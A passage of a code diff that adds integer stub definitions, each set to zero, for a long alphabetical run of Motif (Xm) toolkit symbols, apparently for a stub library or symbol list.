+int _XmRC_UpdateOptionMenuCBG = 0;
+int _XmReadDragBuffer = 0;
+int _XmReadDSFromStream = 0;
+int _XmReadImageAndHotSpotFromFile = 0;
+int _XmReadInitiatorInfo = 0;
+int _XmReasonToMessageType = 0;
+int _XmReCacheLabG = 0;
+int _XmReCacheLabG_r = 0;
+int _XmRecordEvent = 0;
+int _XmRedisplayGadgets = 0;
+int _XmRedisplayHBar = 0;
+int _XmRedisplayLabG = 0;
+int _XmRedisplayVBar = 0;
+int _XmRegionClear = 0;
+int _XmRegionComputeExtents = 0;
+int _XmRegionCreate = 0;
+int _XmRegionCreateSize = 0;
+int _XmRegionDestroy = 0;
+int _XmRegionDrawShadow = 0;
+int _XmRegionEqual = 0;
+int _XmRegionFromImage = 0;
+int _XmRegionGetExtents = 0;
+int _XmRegionGetNumRectangles = 0;
+int _XmRegionGetRectangles = 0;
+int _XmRegionIntersect = 0;
+int _XmRegionIntersectRectWithRegion = 0;
+int _XmRegionIsEmpty = 0;
+int _XmRegionOffset = 0;
+int _XmRegionPointInRegion = 0;
+int _XmRegionSetGCRegion = 0;
+int _XmRegionShrink = 0;
+int _XmRegionSubtract = 0;
+int _XmRegionUnion = 0;
+int _XmRegionUnionRectWithRegion = 0;
+int _XmRegisterConverters = 0;
+int XmRegisterConverters = 0;
+int _XmRegisterPixmapConverters = 0;
+int XmRegisterSegmentEncoding = 0;
+int _XmRemoveAllCallbacks = 0;
+int _XmRemoveCallback = 0;
+int XmRemoveFromPostFromList = 0;
+int _XmRemoveGrab = 0;
+int _XmRemoveHashEntry = 0;
+int _XmRemoveHashIterator = 0;
+int XmRemoveProtocolCallback = 0;
+int XmRemoveProtocols = 0;
+int XmRemoveTabGroup = 0;
+int _Xm_RemQueue = 0;
+int _XmRenderCacheGet = 0;
+int _XmRenderCacheSet = 0;
+int XmRenderTableAddRenditions = 0;
+int XmRenderTableCopy = 0;
+int XmRenderTableCvtFromProp = 0;
+int XmRenderTableCvtToProp = 0;
+int _XmRenderTableDisplay = 0;
+int _XmRenderTableFindFallback = 0;
+int _XmRenderTableFindFirstFont = 0;
+int _XmRenderTableFindRendition = 0;
+int XmRenderTableFree = 0;
+int XmRenderTableGetDefaultFontExtents = 0;
+int XmRenderTableGetRendition = 0;
+int XmRenderTableGetRenditions = 0;
+int XmRenderTableGetTags = 0;
+int _XmRenderTableRemoveRenditions = 0;
+int XmRenderTableRemoveRenditions = 0;
+int _XmRenditionCopy = 0;
+int _XmRenditionCreate = 0;
+int XmRenditionCreate = 0;
+int XmRenditionFree = 0;
+int _XmRenditionMerge = 0;
+int XmRenditionRetrieve = 0;
+int XmRenditionUpdate = 0;
+int _XmReOrderResourceList = 0;
+int XmRepTypeAddReverse = 0;
+int XmRepTypeGetId = 0;
+int XmRepTypeGetNameList = 0;
+int XmRepTypeGetRecord = 0;
+int XmRepTypeGetRegistered = 0;
+int _XmRepTypeInstallConverters = 0;
+int XmRepTypeInstallTearOffModelConverter = 0;
+int XmRepTypeRegister = 0;
+int XmRepTypeValidValue = 0;
+int _XmRequestNewSize = 0;
+int _XmResetTravGraph = 0;
+int _XmResizeHashTable = 0;
+int _XmResizeObject = 0;
+int _XmResizeWidget = 0;
+int XmResolveAllPartOffsets = 0;
+int XmResolveAllPartOffsets64 = 0;
+int XmResolvePartOffsets = 0;
+int _XmRestoreCoreClassTranslations = 0;
+int _XmRestoreExcludedTearOffToToplevelShell = 0;
+int _XmRestoreTearOffToMenuShell = 0;
+int _XmRestoreTearOffToToplevelShell = 0;
+int _XmRootGeometryManager = 0;
+int _XmRowColumn_bar_table = 0;
+int xmRowColumnClassRec = 0;
+int _XmRowColumn_menu_table = 0;
+int _XmRowColumn_menu_traversal_table = 0;
+int _XmRowColumn_option_table = 0;
+int xmRowColumnWidgetClass = 0;
+int _XmSaccelerator = 0;
+int _XmSacceleratorText = 0;
+int _XmSactivateCallback = 0;
+int _XmSadjustLast = 0;
+int _XmSadjustMargin = 0;
+int _XmSalignment = 0;
+int _XmSallowOverlap = 0;
+int _XmSallowResize = 0;
+int _XmSanimationMask = 0;
+int _XmSanimationPixmap = 0;
+int _XmSanimationPixmapDepth = 0;
+int _XmSanimationStyle = 0;
+int _XmSapplyCallback = 0;
+int _XmSapplyLabelString = 0;
+int _XmSarmCallback = 0;
+int _XmSarmColor = 0;
+int _XmSarmPixmap = 0;
+int _XmSarrowDirection = 0;
+int xmSashClassRec = 0;
+int _XmSash_defTranslations = 0;
+int xmSashWidgetClass = 0;
+int _XmSattachment = 0;
+int _XmSaudibleWarning = 0;
+int _XmSautomaticSelection = 0;
+int _XmSautoShowCursorPosition = 0;
+int _XmSautoUnmanage = 0;
+int _XmSavailability = 0;
+int _XmSaveCoreClassTranslations = 0;
+int _XmSaveMenuProcContext = 0;
+int _XmSblendModel = 0;
+int _XmSblinkRate = 0;
+int _XmSbottomAttachment = 0;
+int _XmSbottomOffset = 0;
+int _XmSbottomPosition = 0;
+int _XmSbottomShadowColor = 0;
+int _XmSbottomShadowPixmap = 0;
+int _XmSbottomWidget = 0;
+int _XmSbrowseSelectionCallback = 0;
+int _XmSbuttonAccelerators = 0;
+int _XmSbuttonAcceleratorText = 0;
+int _XmSbuttonCount = 0;
+int _XmSbuttonFontList = 0;
+int _XmSbuttonMnemonicCharSets = 0;
+int _XmSbuttonMnemonics = 0;
+int _XmSbuttons = 0;
+int _XmSbuttonSet = 0;
+int _XmSbuttonType = 0;
+int _XmSCAccelerator = 0;
+int _XmSCAcceleratorText = 0;
+int _XmSCAdjustLast = 0;
+int _XmSCAdjustMargin = 0;
+int xmScaleClassRec = 0;
+int _XmScaleGetTitleString = 0;
+int XmScaleGetValue = 0;
+int XmScaleSetTicks = 0;
+int XmScaleSetValue = 0;
+int xmScaleWidgetClass = 0;
+int _XmSCAlignment = 0;
+int _XmSCAllowOverlap = 0;
+int _XmScancelButton = 0;
+int _XmScancelCallback = 0;
+int _XmScancelLabelString = 0;
+int _XmSCAnimationMask = 0;
+int _XmSCAnimationPixmap = 0;
+int _XmSCAnimationPixmapDepth = 0;
+int _XmSCAnimationStyle = 0;
+int _XmScanningCacheGet = 0;
+int _XmScanningCacheSet = 0;
+int _XmSCApplyLabelString = 0;
+int _XmSCArmCallback = 0;
+int _XmSCArmColor = 0;
+int _XmSCArmPixmap = 0;
+int _XmSCArrowDirection = 0;
+int _XmScascadeButton = 0;
+int _XmScascadePixmap = 0;
+int _XmScascadingCallback = 0;
+int _XmSCAtomList = 0;
+int _XmSCAttachment = 0;
+int _XmSCAudibleWarning = 0;
+int _XmSCAutomaticSelection = 0;
+int _XmSCAutoShowCursorPosition = 0;
+int _XmSCAutoUnmanage = 0;
+int _XmSCAvailability = 0;
+int _XmSCBackgroundPixmap = 0;
+int _XmSCBlendModel = 0;
+int _XmSCBlinkRate = 0;
+int _XmSCBooleanDimension = 0;
+int _XmSCBottomShadowColor = 0;
+int _XmSCBottomShadowPixmap = 0;
+int _XmSCButtonAccelerators = 0;
+int _XmSCButtonAcceleratorText = 0;
+int _XmSCButtonCount = 0;
+int _XmSCButtonFontList = 0;
+int _XmSCButtonMnemonicCharSets = 0;
+int _XmSCButtonMnemonics = 0;
+int _XmSCButtons = 0;
+int _XmSCButtonSet = 0;
+int _XmSCButtonType = 0;
+int _XmSCCallbackProc = 0;
+int _XmSCCancelLabelString = 0;
+int _XmSCChar = 0;
+int _XmSCCharSetTable = 0;
+int _XmSCChildHorizontalAlignment = 0;
+int _XmSCChildHorizontalSpacing = 0;
+int _XmSCChildPlacement = 0;
+int _XmSCChildren = 0;
+int _XmSCChildType = 0;
+int _XmSCChildVerticalAlignment = 0;
+int _XmSCClientData = 0;
+int _XmSCClipWindow = 0;
+int _XmSCColumns = 0;
+int _XmSCCommandWindow = 0;
+int _XmSCCommandWindowLocation = 0;
+int _XmSCCompoundText = 0;
+int _XmSCConvertProc = 0;
+int _XmSCCursorBackground = 0;
+int _XmSCCursorForeground = 0;
+int _XmSCCursorPosition = 0;
+int _XmSCCursorPositionVisible = 0;
+int _XmSCDarkThreshold = 0;
+int _XmSCDecimalPoints = 0;
+int _XmSCDefaultButtonShadowThickness = 0;
+int _XmSCDefaultButtonType = 0;
+int _XmSCDefaultCopyCursorIcon = 0;
+int _XmSCDefaultFontList = 0;
+int _XmSCDefaultInvalidCursorIcon = 0;
+int _XmSCDefaultLinkCursorIcon = 0;
+int _XmSCDefaultMoveCursorIcon = 0;
+int _XmSCDefaultNoneCursorIcon = 0;
+int _XmSCDefaultPosition = 0;
+int _XmSCDefaultSourceCursorIcon = 0;
+int _XmSCDefaultValidCursorIcon = 0;
+int _XmSCDeleteResponse = 0;
+int _XmSCDesktopParent = 0;
+int _XmSCDialogStyle = 0;
+int _XmSCDialogTitle = 0;
+int _XmSCDialogType = 0;
+int _XmSCDirectory = 0;
+int _XmSCDirectoryValid = 0;
+int _XmSCDirListItemCount = 0;
+int _XmSCDirListItems = 0;
+int _XmSCDirListLabelString = 0;
+int _XmSCDirMask = 0;
+int _XmSCDirSearchProc = 0;
+int _XmSCDirSpec = 0;
+int _XmSCDisarmCallback = 0;
+int _XmSCDoubleClickInterval = 0;
+int _XmSCDragContextClass = 0;
+int _XmSCDragDropFinishCallback = 0;
+int _XmSCDragIconClass = 0;
+int _XmSCDragInitiatorProtocolStyle = 0;
+int _XmSCDragMotionCallback = 0;
+int _XmSCDragOperations = 0;
+int _XmSCDragOverMode = 0;
+int _XmSCDragProc = 0;
+int _XmSCDragReceiverProtocolStyle = 0;
+int _XmSCDropProc = 0;
+int _XmSCDropRectangles = 0;
+int _XmSCDropSiteActivity = 0;
+int _XmSCDropSiteEnterCallback = 0;
+int _XmSCDropSiteLeaveCallback = 0;
+int _XmSCDropSiteManagerClass = 0;
+int _XmSCDropSiteOperations = 0;
+int _XmSCDropSiteType = 0;
+int _XmSCDropStartCallback = 0;
+int _XmSCDropTransferClass = 0;
+int _XmSCDropTransfers = 0;
+int _XmSCEditable = 0;
+int _XmSCEntryBorder = 0;
+int _XmSCEntryClass = 0;
+int _XmSCExportTargets = 0;
+int _XmSCExposeCallback = 0;
+int _XmSCExtensionType = 0;
+int _XmSCFileListItemCount = 0;
+int _XmSCFileListItems = 0;
+int _XmSCFileListLabelString = 0;
+int _XmSCFileSearchProc = 0;
+int _XmSCFileTypeMask = 0;
+int _XmSCFillOnArm = 0;
+int _XmSCFillOnSelect = 0;
+int _XmSCFilterLabelString = 0;
+int _XmSCFontList = 0;
+int _XmSCFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCForegroundThreshold = 0;
+int _XmSCGadgetPixmap = 0;
+int _XmScheckButton = 0;
+int _XmSCHelpLabelString = 0;
+int _XmSCHighlightColor = 0;
+int _XmSCHighlightOnEnter = 0;
+int _XmSCHighlightPixmap = 0;
+int _XmSCHighlightThickness = 0;
+int _XmSchildHorizontalAlignment = 0;
+int _XmSchildHorizontalSpacing = 0;
+int _XmSchildPlacement = 0;
+int _XmSchildPosition = 0;
+int _XmSchildType = 0;
+int _XmSchildVerticalAlignment = 0;
+int _XmSCHorizontalDimension = 0;
+int _XmSCHorizontalFontUnit = 0;
+int _XmSCHorizontalInt = 0;
+int _XmSCHorizontalPosition = 0;
+int _XmSCHorizontalScrollBar = 0;
+int _XmSCHot = 0;
+int _XmSCICCHandle = 0;
+int _XmSCIconAttachment = 0;
+int _XmSCImportTargets = 0;
+int _XmSCIncrement = 0;
+int _XmSCIncremental = 0;
+int _XmSCIndicatorOn = 0;
+int _XmSCIndicatorSize = 0;
+int _XmSCIndicatorType = 0;
+int _XmSCInitialDelay = 0;
+int _XmSCInitialFocus = 0;
+int _XmSCInputCreate = 0;
+int _XmSCInputMethod = 0;
+int _XmSCInvalidCursorForeground = 0;
+int _XmSCIsAligned = 0;
+int _XmSCIsHomogeneous = 0;
+int _XmSCISO8859_DASH_1 = 0;
+int _XmSCItemCount = 0;
+int _XmSCItems = 0;
+int _XmSCKeyboardFocusPolicy = 0;
+int _XmSCKeySym = 0;
+int _XmSCKeySymTable = 0;
+int _XmSCLabelFontList = 0;
+int _XmSCLabelInsensitivePixmap = 0;
+int _XmSCLabelPixmap = 0;
+int _XmSCLabelString = 0;
+int _XmSCLabelType = 0;
+int _XmSclientData = 0;
+int _XmSCLightThreshold = 0;
+int _XmSclipWindow = 0;
+int _XmSCListLabelString = 0;
+int _XmSCListMarginHeight = 0;
+int _XmSCListMarginWidth = 0;
+int _XmSCListSizePolicy = 0;
+int _XmSCListSpacing = 0;
+int _XmSCListUpdated = 0;
+int _XmSCLogicalParent = 0;
+int _XmSCMainWindowMarginHeight = 0;
+int _XmSCMainWindowMarginWidth = 0;
+int _XmSCManBottomShadowPixmap = 0;
+int _XmSCManForegroundPixmap = 0;
+int _XmSCManHighlightPixmap = 0;
+int _XmSCManTopShadowPixmap = 0;
+int _XmSCMappingDelay = 0;
+int _XmSCMarginBottom = 0;
+int _XmSCMarginHeight = 0;
+int _XmSCMarginLeft = 0;
+int _XmSCMarginRight = 0;
+int _XmSCMarginTop = 0;
+int _XmSCMarginWidth = 0;
+int _XmSCMask = 0;
+int _XmSCMaximum = 0;
+int _XmSCMaxItems = 0;
+int _XmSCMaxLength = 0;
+int _XmSCMaxValue = 0;
+int _XmSCMenuBar = 0;
+int _XmSCMenuPost = 0;
+int _XmSCMenuWidget = 0;
+int _XmSCMessageProc = 0;
+int _XmSCMessageWindow = 0;
+int _XmSCMinimizeButtons = 0;
+int _XmSCMinimum = 0;
+int _XmSCMnemonic = 0;
+int _XmSCMnemonicCharSet = 0;
+int _XmSCMoveOpaque = 0;
+int _XmSCMultiClick = 0;
+int _XmSCMustMatch = 0;
+int _XmSCMwmDecorations = 0;
+int _XmSCMwmFunctions = 0;
+int _XmSCMwmInputMode = 0;
+int _XmSCMwmMenu = 0;
+int _XmSCMwmMessages = 0;
+int _XmSCNavigationType = 0;
+int _XmSCNeedsMotion = 0;
+int _XmSCNoMatchString = 0;
+int _XmSCNoneCursorForeground = 0;
+int _XmSCNoResize = 0;
+int _XmSCNotifyProc = 0;
+int _XmSCNumChildren = 0;
+int _XmSCNumColumns = 0;
+int _XmSCNumDropRectangles = 0;
+int _XmSCNumDropTransfers = 0;
+int _XmSCNumExportTargets = 0;
+int _XmSCNumImportTargets = 0;
+int _XmSCOffset = 0;
+int _XmSCOkLabelString = 0;
+int _XmScolumns = 0;
+int _XmScommand = 0;
+int _XmScommandChangedCallback = 0;
+int _XmScommandEnteredCallback = 0;
+int _XmScommandWindow = 0;
+int _XmScommandWindowLocation = 0;
+int _XmSconvertProc = 0;
+int _XmSCOperationChangedCallback = 0;
+int _XmSCOperationCursorIcon = 0;
+int _XmSCOptionLabel = 0;
+int _XmSCOptionMnemonic = 0;
+int _XmSCOutputCreate = 0;
+int _XmSCPacking = 0;
+int _XmSCPageIncrement = 0;
+int _XmSCPaneMaximum = 0;
+int _XmSCPaneMinimum = 0;
+int _XmSCPattern = 0;
+int _XmSCPendingDelete = 0;
+int _XmSCPopupEnabled = 0;
+int _XmSCPositionIndex = 0;
+int _XmSCPostFromButton = 0;
+int _XmSCPostFromCount = 0;
+int _XmSCPostFromList = 0;
+int _XmSCPreeditType = 0;
+int _XmSCPrimForegroundPixmap = 0;
+int _XmSCProc = 0;
+int _XmSCProcessingDirection = 0;
+int _XmSCPromptString = 0;
+int _XmSCProtocolCallback = 0;
+int _XmSCPushButtonEnabled = 0;
+int _XmSCQualifySearchDataProc = 0;
+int _XmSCRadioAlwaysOne = 0;
+int _XmSCRadioBehavior = 0;
+int _XmSCRecomputeSize = 0;
+int _XmSCRectangleList = 0;
+int _XmSCRectangles = 0;
+int xmScreenClass = 0;
+int xmScreenClassRec = 0;
+int _XmScreenGetOperationIcon = 0;
+int _XmScreenGetSourceIcon = 0;
+int _XmScreenGetStateIcon = 0;
+int xmScreenObjectClass = 0;
+int _XmScreenRemoveFromCursorCache = 0;
+int _XmSCRepeatDelay = 0;
+int _XmSCResizeCallback = 0;
+int _XmSCResizeHeight = 0;
+int _XmSCResizePolicy = 0;
+int _XmSCResizeWidth = 0;
+int xmScrollBarClassRec = 0;
+int _XmScrollBar_defaultTranslations = 0;
+int XmScrollBarGetValues = 0;
+int XmScrollBarSetValues = 0;
+int xmScrollBarWidgetClass = 0;
+int xmScrolledWindowClassRec = 0;
+int XmScrolledWindowSetAreas = 0;
+int xmScrolledWindowWidgetClass = 0;
+int _XmScrolledW_ScrolledWindowXlations = 0;
+int XmScrollVisible = 0;
+int _XmSCRowColumnType = 0;
+int _XmSCRows = 0;
+int _XmSCRubberPositioning = 0;
+int _XmSCSashHeight = 0;
+int _XmSCSashIndent = 0;
+int _XmSCSashWidth = 0;
+int _XmSCScaleHeight = 0;
+int _XmSCScaleMultiple = 0;
+int _XmSCScaleWidth = 0;
+int _XmSCScroll = 0;
+int _XmSCScrollBarDisplayPolicy = 0;
+int _XmSCScrollBarPlacement = 0;
+int _XmSCScrolledWindowMarginHeight = 0;
+int _XmSCScrolledWindowMarginWidth = 0;
+int _XmSCScrollingPolicy = 0;
+int _XmSCScrollSide = 0;
+int _XmSCSelectColor = 0;
+int _XmSCSelectedItemCount = 0;
+int _XmSCSelectedItems = 0;
+int _XmSCSelectInsensitivePixmap = 0;
+int _XmSCSelectionArrayCount = 0;
+int _XmSCSelectionLabelString = 0;
+int _XmSCSelectionPolicy = 0;
+int _XmSCSelectionType = 0;
+int _XmSCSelectPixmap = 0;
+int _XmSCSelectThreshold = 0;
+int _XmSCSeparatorOn = 0;
+int _XmSCSeparatorType = 0;
+int _XmSCSet = 0;
+int _XmSCShadowThickness = 0;
+int _XmSCShadowType = 0;
+int _XmSCShellHorizDim = 0;
+int _XmSCShellHorizPos = 0;
+int _XmSCShellUnitType = 0;
+int _XmSCShellVertDim = 0;
+int _XmSCShellVertPos = 0;
+int _XmSCShowArrows = 0;
+int _XmSCShowAsDefault = 0;
+int _XmSCShowSeparator = 0;
+int _XmSCShowValue = 0;
+int _XmSCSimpleCheckBox = 0;
+int _XmSCSimpleMenuBar = 0;
+int _XmSCSimpleOptionMenu = 0;
+int _XmSCSimplePopupMenu = 0;
+int _XmSCSimplePulldownMenu = 0;
+int _XmSCSimpleRadioBox = 0;
+int _XmSCSizePolicy = 0;
+int _XmSCSliderSize = 0;
+int _XmSCSource = 0;
+int _XmSCSourceCursorIcon = 0;
+int _XmSCSourceIsExternal = 0;
+int _XmSCSourcePixmapIcon = 0;
+int _XmSCSourceWidget = 0;
+int _XmSCSourceWindow = 0;
+int _XmSCSpacing = 0;
+int _XmSCStartTime = 0;
+int _XmSCStateCursorIcon = 0;
+int _XmSCStringDirection = 0;
+int _XmSCTearOffModel = 0;
+int _XmSCTextFontList = 0;
+int _XmSCTextString = 0;
+int _XmSCTextValue = 0;
+int _XmSCTitleString = 0;
+int _XmSCTopCharacter = 0;
+int _XmSCTopItemPosition = 0;
+int _XmSCTopLevelEnterCallback = 0;
+int _XmSCTopLevelLeaveCallback = 0;
+int _XmSCTopShadowColor = 0;
+int _XmSCTopShadowPixmap = 0;
+int _XmSCTransferProc = 0;
+int _XmSCTransferStatus = 0;
+int _XmSCTraversalOn = 0;
+int _XmSCTraversalType = 0;
+int _XmSCTreeUpdateProc = 0;
+int _XmSCTroughColor = 0;
+int _XmSCUnitType = 0;
+int _XmSCUnpostBehavior = 0;
+int _XmSCUnselectPixmap = 0;
+int _XmSCUpdateSliderSize = 0;
+int _XmScursorBackground = 0;
+int _XmScursorForeground = 0;
+int _XmScursorPosition = 0;
+int _XmScursorPositionVisible = 0;
+int _XmSCUseAsyncGeometry = 0;
+int _XmSCUserData = 0;
+int _XmSCValidCursorForeground = 0;
+int _XmSCValueChangedCallback = 0;
+int _XmSCValueWcs = 0;
+int _XmSCVerifyBell = 0;
+int _XmSCVerticalAlignment = 0;
+int _XmSCVerticalDimension = 0;
+int _XmSCVerticalFontUnit = 0;
+int _XmSCVerticalInt = 0;
+int _XmSCVerticalPosition = 0;
+int _XmSCVerticalScrollBar = 0;
+int _XmSCVirtualBinding = 0;
+int _XmSCVisibleItemCount = 0;
+int _XmSCVisibleWhenOff = 0;
+int _XmSCVisualPolicy = 0;
+int _XmSCWhichButton = 0;
+int _XmSCWordWrap = 0;
+int _XmSCWorkWindow = 0;
+int _XmSCXmBackgroundPixmap = 0;
+int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCXmString = 0;
+int _XmSCXmStringCharSet = 0;
+int _XmSCXmStringTable = 0;
+int _XmSdarkThreshold = 0;
+int _XmSdecimalPoints = 0;
+int _XmSdecrementCallback = 0;
+int _XmSdefaultActionCallback = 0;
+int _XmSDEFAULT_BACKGROUND = 0;
+int _XmSdefaultButton = 0;
+int _XmSdefaultButtonShadowThickness = 0;
+int _XmSdefaultButtonType = 0;
+int _XmSdefaultCopyCursorIcon = 0;
+int _XmSDEFAULT_FONT = 0;
+int _XmSdefaultFontList = 0;
+int _XmSdefaultInvalidCursorIcon = 0;
+int _XmSdefaultLinkCursorIcon = 0;
+int _XmSdefaultMoveCursorIcon = 0;
+int _XmSdefaultNoneCursorIcon = 0;
+int _XmSdefaultPosition = 0;
+int _XmSdefaultSourceCursorIcon = 0;
+int _XmSdefaultValidCursorIcon = 0;
+int _XmSdeleteResponse = 0;
+int _XmSdesktopParent = 0;
+int _XmSdialogStyle = 0;
+int _XmSdialogTitle = 0;
+int _XmSdialogType = 0;
+int _XmSdirectory = 0;
+int _XmSdirectoryValid = 0;
+int _XmSdirListItemCount = 0;
+int _XmSdirListItems = 0;
+int _XmSdirListLabelString = 0;
+int _XmSdirMask = 0;
+int _XmSdirSearchProc = 0;
+int _XmSdirSpec = 0;
+int _XmSdisarmCallback = 0;
+int _XmSdoubleClickInterval = 0;
+int _XmSdoubleSeparator = 0;
+int _XmSdragCallback = 0;
+int _XmSdragContextClass = 0;
+int _XmSdragDropFinishCallback = 0;
+int _XmSdragIconClass = 0;
+int _XmSdragInitiatorProtocolStyle = 0;
+int _XmSdragMotionCallback = 0;
+int _XmSdragOperations = 0;
+int _XmSdragOverMode = 0;
+int _XmSdragProc = 0;
+int _XmSdragReceiverProtocolStyle = 0;
+int _XmSdropFinishCallback = 0;
+int _XmSdropProc = 0;
+int _XmSdropRectangles = 0;
+int _XmSdropSiteActivity = 0;
+int _XmSdropSiteEnterCallback = 0;
+int _XmSdropSiteLeaveCallback = 0;
+int _XmSdropSiteManagerClass = 0;
+int _XmSdropSiteOperations = 0;
+int _XmSdropSiteType = 0;
+int _XmSdropStartCallback = 0;
+int _XmSdropTransferClass = 0;
+int _XmSdropTransfers = 0;
+int _XmSearchColorCache = 0;
+int _XmSecondaryResourceData = 0;
+int _XmSeditable = 0;
+int _XmSeditMode = 0;
+int _XmSelectColorDefault = 0;
+int _XmSelectioB_defaultTextAccelerators = 0;
+int xmSelectionBoxClassRec = 0;
+int _XmSelectionBoxCreateApplyButton = 0;
+int _XmSelectionBoxCreateCancelButton = 0;
+int _XmSelectionBoxCreateHelpButton = 0;
+int _XmSelectionBoxCreateList = 0;
+int _XmSelectionBoxCreateListLabel = 0;
+int _XmSelectionBoxCreateOkButton = 0;
+int _XmSelectionBoxCreateSelectionLabel = 0;
+int _XmSelectionBoxCreateSeparator = 0;
+int _XmSelectionBoxCreateText = 0;
+int _XmSelectionBoxGeoMatrixCreate = 0;
+int _XmSelectionBoxGetApplyLabelString = 0;
+int _XmSelectionBoxGetCancelLabelString = 0;
+int XmSelectionBoxGetChild = 0;
+int _XmSelectionBoxGetHelpLabelString = 0;
+int _XmSelectionBoxGetListItemCount = 0;
+int _XmSelectionBoxGetListItems = 0;
+int _XmSelectionBoxGetListLabelString = 0;
+int _XmSelectionBoxGetListVisibleItemCount = 0;
+int _XmSelectionBoxGetOkLabelString = 0;
+int _XmSelectionBoxGetSelectionLabelString = 0;
+int _XmSelectionBoxGetTextColumns = 0;
+int _XmSelectionBoxGetTextString = 0;
+int _XmSelectionBoxNoGeoRequest = 0;
+int _XmSelectionBoxRestore = 0;
+int _XmSelectionBoxUpOrDown = 0;
+int xmSelectionBoxWidgetClass = 0;
+int _XmSEMPTY_STRING = 0;
+int _XmSendICCCallback = 0;
+int _XmSentryAlignment = 0;
+int _XmSentryBorder = 0;
+int _XmSentryCallback = 0;
+int _XmSentryClass = 0;
+int _XmSentryVerticalAlignment = 0;
+int _XmSeparatorCacheCompare = 0;
+int xmSeparatorClassRec = 0;
+int _XmSeparatorFix = 0;
+int xmSeparatorGadgetClass = 0;
+int xmSeparatorGadgetClassRec = 0;
+int xmSeparatorGCacheObjClassRec = 0;
+int xmSeparatorWidgetClass = 0;
+int _XmSetActiveTabGroup = 0;
+int _XmSetActualClass = 0;
+int XmSetColorCalculation = 0;
+int _XmSetDefaultBackgroundColorSpec = 0;
+int _XmSetDestination = 0;
+int _XmSetDragReceiverInfo = 0;
+int _XmSetEtchedSlider = 0;
+int _XmSetFocusFlag = 0;
+int _XmSetFocusResetFlag = 0;
+int XmSetFontUnit = 0;
+int XmSetFontUnits = 0;
+int _XmSetInDragMode = 0;
+int _XmSetInitialOfTabGraph = 0;
+int _XmSetInitialOfTabGroup = 0;
+int _XmSetKidGeo = 0;
+int _XmSetLastManagedMenuTime = 0;
+int XmSetMenuCursor = 0;
+int _XmSetMenuTraversal = 0;
+int _XmSetPopupMenuClick = 0;
+int XmSetProtocolHooks = 0;
+int _XmSetRect = 0;
+int _XmSetSwallowEventHandler = 0;
+int _XmSetThickness = 0;
+int _XmSetThicknessDefault0 = 0;
+int XmSetToolTipString = 0;
+int _XmSetTransientFlag = 0;
+int _XmSetValuesOnChildren = 0;
+int _XmSetXmDisplayClass = 0;
+int _XmSexportTargets = 0;
+int _XmSexposeCallback = 0;
+int _XmSextendedSelectionCallback = 0;
+int _XmSextensionType = 0;
+int _XmSFAddNavigator = 0;
+int _XmSfileListItemCount = 0;
+int _XmSfileListItems = 0;
+int _XmSfileListLabelString = 0;
+int _XmSfileSearchProc = 0;
+int _XmSfileTypeMask = 0;
+int _XmSfillOnArm = 0;
+int _XmSfillOnSelect = 0;
+int _XmSfilterLabelString = 0;
+int _XmSfocusCallback = 0;
+int _XmSfocusMovedCallback = 0;
+int _XmSfocusPolicyChanged = 0;
+int _XmSfontList = 0;
+int _XmSforegroundThreshold = 0;
+int _XmSfractionBase = 0;
+int _XmSFRemoveNavigator = 0;
+int _XmSFUpdateNavigatorsValue = 0;
+int _XmSgainPrimaryCallback = 0;
+int xmShellExtClassRec = 0;
+int xmShellExtObjectClass = 0;
+int _XmShellIsExclusive = 0;
+int _XmShelpCallback = 0;
+int _XmShelpLabelString = 0;
+int _XmShighlightColor = 0;
+int _XmShighlightOnEnter = 0;
+int _XmShighlightPixmap = 0;
+int _XmShighlightThickness = 0;
+int _XmShistoryItemCount = 0;
+int _XmShistoryItems = 0;
+int _XmShistoryMaxItems = 0;
+int _XmShistoryVisibleItemCount = 0;
+int _XmShorizontalFontUnit = 0;
+int _XmShorizontalScrollBar = 0;
+int _XmShorizontalSpacing = 0;
+int _XmShotX = 0;
+int _XmShotY = 0;
+int _XmSiccHandle = 0;
+int XmSimpleSpinBoxAddItem = 0;
+int xmSimpleSpinBoxClassRec = 0;
+int XmSimpleSpinBoxDeletePos = 0;
+int XmSimpleSpinBoxSetItem = 0;
+int xmSimpleSpinBoxWidgetClass = 0;
+int _XmSimportTargets = 0;
+int _XmSincrement = 0;
+int _XmSincremental = 0;
+int _XmSincrementCallback = 0;
+int _XmSindicatorOn = 0;
+int _XmSindicatorSize = 0;
+int _XmSindicatorType = 0;
+int _XmSinitialDelay = 0;
+int _XmSinitialFocus = 0;
+int _XmSinputCallback = 0;
+int _XmSinputCreate = 0;
+int _XmSinputMethod = 0;
+int _XmSinvalidCursorForeground = 0;
+int _XmSisAligned = 0;
+int _XmSisHomogeneous = 0;
+int _XmSitemCount = 0;
+int _XmSitems = 0;
+int _XmSkeyboardFocusPolicy = 0;
+int _XmSlabelFontList = 0;
+int _XmSlabelInsensitivePixmap = 0;
+int _XmSlabelPixmap = 0;
+int _XmSlabelString = 0;
+int _XmSlabelType = 0;
+int _XmSleep = 0;
+int _XmSleftAttachment = 0;
+int _XmSleftOffset = 0;
+int _XmSleftPosition = 0;
+int _XmSleftWidget = 0;
+int xmSlideContextClassRec = 0;
+int xmSlideContextWidgetClass = 0;
+int _XmSlightThreshold = 0;
+int _XmSlistItemCount = 0;
+int _XmSlistItems = 0;
+int _XmSlistLabelString = 0;
+int _XmSlistMarginHeight = 0;
+int _XmSlistMarginWidth = 0;
+int _XmSlistSizePolicy = 0;
+int _XmSlistSpacing = 0;
+int _XmSlistUpdated = 0;
+int _XmSlistVisibleItemCount = 0;
+int _XmSlogicalParent = 0;
+int _XmSlosePrimaryCallback = 0;
+int _XmSlosingFocusCallback = 0;
+int _XmSmainWindowMarginHeight = 0;
+int _XmSmainWindowMarginWidth = 0;
+int _XmSmapCallback = 0;
+int _XmSmappingDelay = 0;
+int _XmSmargin = 0;
+int _XmSmarginBottom = 0;
+int _XmSmarginHeight = 0;
+int _XmSmarginLeft = 0;
+int _XmSmarginRight = 0;
+int _XmSmarginTop = 0;
+int _XmSmarginWidth = 0;
+int _XmSmask = 0;
+int _XmSmaximum = 0;
+int _XmSmaxLength = 0;
+int _XmSmenuAccelerator = 0;
+int _XmSmenuBar = 0;
+int _XmSmenuCursor = 0;
+int _XmSmenuHelpWidget = 0;
+int _XmSmenuHistory = 0;
+int _XmSmenuPost = 0;
+int _XmSmessageAlignment = 0;
+int _XmSmessageProc = 0;
+int _XmSmessageString = 0;
+int _XmSmessageWindow = 0;
+int _XmSminimizeButtons = 0;
+int _XmSminimum = 0;
